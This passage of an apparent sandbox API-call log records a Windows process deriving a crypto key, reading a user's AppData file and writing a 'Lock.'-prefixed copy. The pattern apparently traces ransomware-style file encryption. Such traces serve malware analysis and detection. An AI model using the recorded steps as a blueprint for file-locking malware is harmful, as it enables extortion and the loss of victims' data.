Flags=0x0, Size=0x8) returned 0x24b1848 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0205.902] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0205.902] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.902] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0205.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0205.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0205.903] CryptDeriveKey (in: hProv=0xad28b8, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0205.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.903] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0205.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0205.904] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0205.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0205.905] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.905] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.905] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.905] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0205.905] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0205.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0205.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0205.905] CryptDestroyHash (hHash=0xaa5660) returned 1 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0205.906] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.906] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.906] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.906] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.906] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0205.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ngBTzibcz-Ml b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ngbtzibcz-ml b.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0205.907] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.907] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0205.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0205.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0205.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0205.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0205.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0205.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0205.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0205.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0205.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0205.910] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0205.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0205.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0205.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0205.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0205.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0205.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0205.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.ngBTzibcz-Ml b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.ngbtzibcz-ml b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0205.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0205.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0205.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0205.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0205.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0205.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0205.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0205.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0205.914] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0205.914] ReadFile (in: hFile=0x2c4, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xb5e0, lpOverlapped=0x0) returned 1 [0205.916] ReadFile (in: hFile=0x2c4, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0205.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0205.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb5e0) returned 0x24d7a58 [0205.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0205.918] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0205.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb5e0) returned 0x24e3040 [0205.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0205.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 